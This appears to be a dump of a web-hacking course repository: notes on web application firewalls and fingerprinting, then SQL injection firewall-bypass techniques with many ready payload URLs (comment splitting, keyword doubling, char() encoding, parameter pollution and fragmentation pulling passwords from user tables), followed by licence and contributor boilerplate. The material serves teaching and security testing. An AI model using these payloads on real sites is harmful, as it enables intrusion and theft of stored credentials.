--------------------------------------------------------------------------------
  1 | 
 Waf Bypass Theory

  2 | 
  3 | # Introduction to Web Application Firewall
  4 | 
  5 | ![WAF](../photo/waf.png)
  6 | 
  7 | [Photo Credit](https://www.section.io/engineering-education/web-application-firewall-bot-mitigation-comparison/)
  8 | 
  9 | 
 10 | ## Web Application Firewall
 11 | 
 12 | - A firewall that sit in front of web application and `filter`, `analyze` and `block` all the HTTP traffice pass through and tries to communite with the web server 
 13 | 
 14 | - WAF called `reverse proxies`
 15 | - `proxy can protect client, reverse proxy can protect server`
 16 | 
 17 | ## Two security model of WAF
 18 | 
 19 | 1. Positive (White List)
 20 |     - Allow only traffice that is allowed by WAF and block all the other traffice
 21 | 2. Negative (Black List)
 22 |     - Allow all traffice to pass and only block the traffice filtered by black list
 23 | 
 24 | 
 25 | ## WAF Filter Rules
 26 | 
 27 | - WAF have some `preset rules`
 28 | - If a request matches one of the present rule, the request is block because it is faced as malicious.
 29 | -  most of the enterprise WAF solutions, these rules are hidden, and no one can access or see them. This is happening because developers believe that if these rules are hidden, users won’t know them and
 30 | neither will attackers, so it protects users from easy bypass techniques
 31 | 
 32 | 
 33 | # WAF Fingerprinting
 34 | 
 35 | - 1. Passive Fingerprinting
 36 | - 2. Active Fingerprinting
 37 | 
 38 | 
 39 | ## 1. passive Fingerprinting
 40 | 
 41 | - Find sings of WAF in `HTTP` response of the web server
 42 | - eg. File Header cookie parameter contain (`ns_af=cookie_value`) is the sign of Citrix Netscaler
 43 | 
 44 | ## 2. Active Fingerprinting
 45 | 
 46 | - send two different URI (`/filepath`) and one has successfully return the requested material and the other not ==> WAF is present.
 47 | 
 48 | 
 49 | # WAF fingerprinting with nmap scritp
 50 | 
 51 | `nmap -p80 --script http-waf-detect --script-args="http-waf-detect.aggro " `
 52 | 
 53 | - This script can detect numerous IDS, IPS, and WAF products since they often protect web applications in the same
 54 | way. But it won’t detect products that don’t alter the HTTP traffic. Results can vary based on product configuration,
 55 | but this script has been tested to work against various configurations of the following products
 56 | 
 57 | `nmap --script=http-waf-fingerprint `
 58 | 
 59 | 
 60 | #  WAF fingerprinting with `WAFW00F`
 61 | - Python script that automates WAF fingerprinting and identifies Web Application Firewall (WAF) prod-
 62 | ucts.
 63 | 
 64 | `wafw00f google.com`
 65 | 
 66 | 
 67 | # WAF Function 
 68 | 
 69 | ![How WAF work](../photo/waf_function.png)
 70 | 
 71 | ## 1. Pre-Processor 
 72 | 
 73 | - Decide whether a request will be processed further
 74 | 
 75 | - Filter every incoming request and decide whether a request will be processed further or immediately stop.
 76 | 
 77 | - Very suspicious request are blocked at this stage
 78 | 
 79 | ## 2. Normalization 
 80 | 
 81 | - Standardize user input
 82 | 
 83 | - Use various function 
 84 | 
 85 | - Eg functions
 86 |     - `hexDecode()` = decodes a hex-encoded string
 87 |     - `lowercase()` = converts characters to lower case
 88 |     - `urlDecdoe()` = decode a URL-encoded string
 89 | 
 90 | ## 3. Input Validation 
 91 | 
 92 | - Check user input against policies
 93 | 
 94 | - Validate requests using regular expression
 95 | 
 96 | - Three security model
 97 |     1. Positive security model
 98 |     2. Negative Security Model
 99 |     3. Hybrid Security Model
100 | 
101 | 
102 | 
103 | 
104 | 
105 | 
106 | 
107 | 
108 | 
109 | 
110 | 
111 | 
112 | 
113 | 
114 | 
115 | 


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.2_waf_bypass.md:
--------------------------------------------------------------------------------
  1 | 
WAF bypass Technique
	
  2 | 
  3 | # Bypassing Methods and Techniques
  4 | 
  5 | #### 1. Pre-processor exploitation
  6 | - Make WAF skip input validation
  7 | #### 2. Impedance Mismatch
  8 | - WAF interpret input differently 
  9 | #### 3. Rule set Bypassing
 10 | - Use Payload that are not detected by WAF
 11 | 
 12 | 
 13 | 
 14 | # General step in WAF bypass
 15 | 
 16 | 1. Fingerprint WAF and examine the filter rules
 17 | 2. Encrypt the payload 
 18 | 3. Test payload and examine the response 
 19 | 4. If the payload cannot bypass WAF, use another payload and repeat from step 2
 20 | 
 21 | 
 22 | 
 23 | 
 24 | 
 25 | 
 26 | 
SQL injection WAF bypass

 27 | 
 28 | 
 29 | # Normal Bypassing Technique
 30 | 
 31 | 
 32 | ## Bypass with Comment
 33 | 
 34 | - SQL comments allow to bypass a lot of filtering and WAF
 35 | 
 36 | `http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--`
 37 | 
 38 | 
 39 | 
 40 | ## Case Changing
 41 | 
 42 | Some WAF filter only lowercase SQL keyword
 43 | 
 44 | Regex Filter ==> ` /union\sselect/g`
 45 | 
 46 | `http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--`
 47 | 
 48 | 
 49 | 
 50 | ## Replaced Keyword
 51 | 
 52 | - Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass 
 53 | 
 54 | `http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--`
 55 | 
 56 | - Some case SQL keyword was filtered out and replaced with whitespace. So we can use `%0b` to
 57 | bypass.
 58 | 
 59 | `http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--`
 60 | 
 61 | 
 62 | 
 63 | ## Adding or Removing White Space
 64 | 
 65 | - Adding or Removing space won't affect the SQL statement
 66 | 
 67 | - We can bypass WAF by adding or removing white space
 68 | 
 69 | #### Blocked Query
 70 | `' or 1 = 1'`
 71 | 
 72 | #### By pass statement
 73 | `'or '1'='1'`
 74 | 
 75 | 
 76 | 
 77 | ## Character Encoding
 78 | 
 79 | - Many DBMS have different SQL syntax, most of them support Unicode, Base64, hex, octal, binary
 80 | 
 81 | - Many `blacklisted characters` can be replaced by their functional alternatives 
 82 | 
 83 | 
 84 | - Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only `decode the input once` so `double encoding` can bypass certain filters as the WAF will decode the input once then filter while application keep decoding the SQL statement executing
 85 | 
 86 | #### Normal Query
 87 | 
 88 | `' UNION SELECT table_schema, table_name FROM information_Schema.tables where table_schema = "dvwa" -- -`
 89 | 
 90 | #### Bypass Query
 91 | 
 92 | ``' UNION SELECT table_schema, table_name FROM information_Schema.tables where table_schema = char(100,118,119,97) -- -``
 93 | 
 94 | - we replaced the “dvwa” with char(100,118,119,97) which is the MySQL char() function
 95 | that uses ASCII codes inside and we use it to inject into MySQL without using double quotes that many times gets filtered by WAFs. Char() also works on almost all other databases but sometimes it can only hold one character at a time, like for example char(0x##)+char(0x##)+...So if the one way does not work for us, we have to try another.
 96 | 
 97 | 
 98 | 
 99 | ## Keyword Replacing
100 | 
101 | - Many times keywords themselves are blocked from the WAF. An encode way to bypass this filter is by replacing the keywords we use with others, so once the WAF strips the keyword, our desired keyword will remain
102 | 
103 | `' union selselectect password from mySQL.user limit 1 /*`
104 | 
105 | - WAF is blocking the select keyword.
106 | - Once the query passes and gets filtered, the middle select keyword
107 | - `sel` from the start and `ect` from the end will get merged and form a new select keyword that will get executed in the server.
108 | 
109 | ## string Concatenation
110 | 
111 | - Break up SQL keyword and bypass WAF filter rules
112 | - Concatenation syntax varies based on the database.
113 | 
114 | `EXEC ('SEL' + 'ECT 1'`
115 | 
116 | 
117 | 
118 | ## Buffer Overflow
119 | 
120 | -WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of
121 | data. Give a large amount of data allows our code executing
122 | 
123 | ```
124 | http://victim.com/news.php?id=1+and+(select 1)=(select
125 | 0x414141414141441414141414114141414141414141414141414141414141414141+union+select+1,2,version(),database(),user(),6,7,8,9,10--
126 | 
127 | ```
128 | 
129 | ## Inline Comments (MySQL Only)
130 | 
131 | 
132 | -  MySQL Server supports some variants of C-style comments.
133 | These enable you to write code that includes MySQL extensions, but is still portable, by using
134 | comments of the following form: 
135 | 
136 | `/*! MySQL-specific code */`
137 | 
138 | - A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline
139 | comments.
140 | 
141 | `http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--`
142 | 
143 | - Inline comments can be used throughout the SQL statement so if table_name or information_schema
144 | are filtered we can add more inline comments
145 | 
146 | `http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)
147 | +FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--`
148 | 
149 | 
150 | 


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.3_advnace_waf_bypass.md:
--------------------------------------------------------------------------------
  1 | # Advanced WAF Bypass
  2 | 
  3 | 
  4 | 
  5 | # WAF Filter Rules Bypass
  6 | 
  7 | 
  8 | ## Example
  9 | 
 10 | - If we are testing the `http://web.com?id=1`, then WAF filter rule is like:
 11 | 
 12 | `/?id=1+union+(select+*+from+password)`
 13 | 
 14 | - This request is easily blocked by WAF and we can bypass: 
 15 | 
 16 | `/?id=(1)union(select(1),mid(hash,1,32)from(password))`
 17 | `?/?id=1+union+(select'1',concat(login,hash)from+passwords)`
 18 | 
 19 | 
 20 | - Many WAF filter only one layer of brackets, so we can bypass using additional layer of brackets
 21 | 
 22 | `/?id=(1)union(((((((select(*),hex(hash)from(passwords))))))))`
 23 | 
 24 | 
 25 | ## PHPIDS (PHP Intrusion Detection System) WAF
 26 | 
 27 | - PHPIDS has sone default filter rules that you can find in its GitHub Page
 28 | 
 29 | #### WAF RULE 
 30 | 
 31 | `/?id=1+OR+1=1`
 32 | 
 33 | #### By pass
 34 | 
 35 | `?id=1+OR+0x50=0x50`
 36 | 
 37 | 
 38 | 
 39 | 
 40 | 
 41 | # HTTP parameter Pollution (HPP)
 42 | 
 43 | - sending a number of parameter with the same name
 44 | 
 45 | - Technology interpret this request differently 
 46 | 
 47 | 
 48 | 
 49 | #### Normal Payload
 50 | 
 51 | `http://www.website.com/products/?productid=1`
 52 | 
 53 | #### Bypass Payload
 54 | 
 55 | 
 56 | `http://www.website.com/products/?productid=1&productid=2`
 57 | 
 58 | 	
 59 | 	
 60 | 		
 61 | 		
 62 | 		
 63 | 	
 64 | 	
 65 | 		
 66 | 		
 67 | 		
 68 | 	
 69 | 	
 70 | 		
 71 | 		
 72 | 		
 73 | 	
 74 | 	
 75 | 		
 76 | 		
 77 | 		
 78 | 	
 79 | 	
 80 | 
 81 | 
Backend Behavior Process 
ASP.NET Concat with comma productid=1,2 
JSP First Para productid=1 
PHP Last Para productid=2 

 82 | 
 83 | 
 84 | 
 85 | 
 86 | ## HPP Exploitation with SQL
 87 | 
 88 | #### SQL injection code
 89 | 
 90 | `http://website.com/?id=”queryquery1”&id=”queryquery2`
 91 | 
 92 | #### Backend Query
 93 | 
 94 | `select key from table where id="+Request.QueryString("id")`
 95 | 
 96 | #### WAF by pass
 97 | 
 98 | `/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users`
 99 | 
100 | - WAF remove all `id` parameter excpet last `id` (Beacaues of HPP)
101 | - `/**/` is sql comment
102 | - So, Only SQL query is left in the end and executed
103 | 
104 | #### Final Query in the end 
105 | 
106 | `select key from table where
107 | id=1/**/union/**/select/**/pwd/**/from/*,*/users`
108 | 
109 | 
110 | 
111 | # HTTP Parameter Fregmentation (HPF)
112 | 
113 | #### Vulnerable code
114 | 
115 | `Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
116 | Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);`
117 | 
118 | 
119 | #### WAF RULE 
120 | 
121 | `/?a=1+union+select+1,2/*`
122 | 
123 | 
124 | #### Bypass suing HPF
125 | 
126 | `?a=1+union/*&b=*/select+1,2`
127 | 
128 | `/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--`
129 | 
130 | #### SQL Query in the end
131 | 
132 | `select * from table where a=1 union/* and b=*/select 1,2`
133 | 
134 | `select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--`


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
 1 | # Contributor Covenant Code of Conduct
 2 | 
 3 | ## Our Pledge
 4 | 
 5 | In the interest of fostering an open and welcoming environment, we as
 6 | contributors and maintainers pledge to making participation in our project and
 7 | our community a harassment-free experience for everyone, regardless of age, body
 8 | size, disability, ethnicity, sex characteristics, gender identity and expression,
 9 | level of experience, education, socio-economic status, nationality, personal
10 | appearance, race, religion, or sexual identity and orientation.
11 | 
12 | ## Our Standards
13 | 
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 | 
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 | 
23 | Examples of unacceptable behavior by participants include:
24 | 
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 |  advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 |  address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 |  professional setting
33 | 
34 | ## Our Responsibilities
35 | 
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 | 
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 | 
46 | ## Scope
47 | 
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 | 
55 | ## Enforcement
56 | 
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at theinfecteddrake@gmail.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 | 
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 | 
68 | ## Attribution
69 | 
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
72 | 
73 | [homepage]: https://www.contributor-covenant.org
74 | 
75 | For answers to common questions about this code of conduct, see
76 | https://www.contributor-covenant.org/faq
77 | 


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | I appreciate and recognize [all contributors](https://github.com/0xInfection/awesome-waf/graphs/contributors).
 2 | 
 3 | > First of all thank you for even considering of contributing to this awesome list. __"The community just learns from each other"__.
 4 | 
 5 | ## Table of Contents
 6 | 
 7 | - [Contribution guidelines](#contribution-guidelines)
 8 | - [Quality Standard](#quality-standard)
 9 | - [Adding to this list](#adding-to-this-list)
10 | - [Adding something to an awesome list](#adding-something-to-an-awesome-list)
11 | - [Updating your Pull Request](#updating-your-pull-request)
12 | 
13 | ## Contribution Guidelines
14 | 
15 | __Your pull request/commit message will be a tweet, please keep that in mind.__ :)
16 | 
17 | - **To add to the list:** Submit a pull request.
18 | - **To remove from the list:** Submit a pull request.
19 | - Want to change something: Submit a pull request.
20 | - Want to try something else: Submit a pull request.
21 | - Don't know what to do: Submit a pull request or open an issue, let me know what's going on.
22 | 
23 | [Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind.
24 | 
25 | - If you are submitting a new fingerprint, include the headers/page source, etc.
26 | - Do not include the URL as it may expose the integrity of the site.
27 | > I will contact you personally if necessary via email.
28 | - Item you're adding should not be duplicate, no redirection (be careful with `http` vs `https`!).
29 | - The link should be the name of the slide or project or website.
30 | - Description should be clear and concise (read it out loud to be sure).
31 | - Description should follow the link, on the same line.
32 | - if you want to add more than one link, please don't do all PR on the exact same line, it usually results in conflicts and your PR cannot be automatically merged.
33 | 
34 | Please contribute links to slides/tools you have used or are familiar with. This will help ensure high-quality entries.
35 | 
36 | ## Quality Standard
37 | 
38 | Note that we can help you achieve those standards, just try your best, be brave.
39 | We'll guide you to the best of our abilities.
40 | 
41 | To be on the list, it would be *nice* if entries adhere to these quality standards:
42 | 
43 | - Generally useful to the community.
44 | - Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person.
45 | - Solves a real problem (even a small one)
46 | - If your PR is a **WIP** (work in progress, not safe for production), mention it.
47 | 
48 | If your PR is not merged, I will tell you why so that you may be able to improve it.
49 | 
50 | ## Contribution Guidelines
51 | 
52 | ### Adding to this List
53 | 
54 | Please ensure your pull request adheres to the following guidelines:
55 | 
56 | - Search previous suggestions before making a new one, as yours may be a duplicate.
57 | - Make sure the list is useful before submitting. That implies it has enough content and every item has a good succinct description.
58 | - Make an individual pull request for each suggestion.
59 | - Use [title-casing](http://titlecapitalization.com) (AP style).
60 | - Use the following format: `[List Name](link)`
61 | - Link additions should be added to the bottom of the relevant category.
62 | - New categories or improvements to the existing categorization are welcome.
63 | - Check your spelling and grammar.
64 | - Make sure your text editor is set to remove trailing whitespace.
65 | - The pull request and commit should have a useful title.
66 | - The body of your commit message should contain a link to the repository.
67 | 
68 | Thank you for your contributions!
69 | 
70 | ### Adding something to an Awesome List
71 | 
72 | If you have something awesome to contribute to an awesome list, this is how you do it.
73 | 
74 | You'll need a [GitHub account](https://github.com/join)!
75 | 
76 | 1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome
77 | 2. Click on the `readme.md` file: 
78 | 
79 | ![Step 2 Click on Readme.md](https://cloud.githubusercontent.com/assets/170270/9402920/53a7e3ea-480c-11e5-9d81-aecf64be55eb.png)
80 | 
81 | 3. Now click on the edit icon. 
82 | 
83 | ![Step 3 - Click on Edit](https://cloud.githubusercontent.com/assets/170270/9402927/6506af22-480c-11e5-8c18-7ea823530099.png)
84 | 
85 | 4. You can start editing the text of the file in the in-browser editor. Make sure you follow guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/). 
86 | 
87 | ![Step 4 - Edit the file](https://cloud.githubusercontent.com/assets/170270/9402932/7301c3a0-480c-11e5-81f5-7e343b71674f.png)
88 | 
89 | 5. Say why you're proposing the changes, and then click on "Propose file change". 
90 | 
91 | ![Step 5 - Propose Changes](https://cloud.githubusercontent.com/assets/170270/9402937/7dd0652a-480c-11e5-9138-bd14244593d5.png)
92 | 
93 | 6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)!
94 | 
95 | ### Updating your Pull Request
96 | 
97 | Sometimes, a maintainer of an awesome list will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the awesome-* list guidelines.
98 | 
99 | [Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write up on how to change a Pull Request, and the different ways you can do that.


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/LICENSE:
--------------------------------------------------------------------------------
  1 |                                  Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "{}"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright {yyyy} {name of copyright owner}
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/character-interpretations.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/character-interpretations.png


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/how-wafs-work.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/how-wafs-work.png


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/waf-general-arch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/waf-general-arch.png


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/others/README.md:
--------------------------------------------------------------------------------
 1 | ## [`obfu.py`](https://github.com/0xinfection/awesome-waf/blob/master/others/obfu.py)
 2 | > A small script to encode and obfuscate your payloads easily to your desired encodings.
 3 | 
 4 | ### Usage:
 5 | ```
 6 | $ python obfu.py -h
 7 | 
 8 |         OBFUSCATOR
 9 | 
10 | usage: python3 obfu.py [-h] [-s STR] [-e ENC] [-ueo] [-udi]
11 | 
12 | Required Arguments:
13 |   -s STR, --str STR  String to obfuscate
14 |   -e ENC, --enc ENC  Encoding type. eg: ibm037, utf16, etc
15 | 
16 | Optional Arguments:
17 |   -ueo               URL Encode Output
18 |   -udi               URL Decode Input
19 | ```
20 | ### Example Usage:
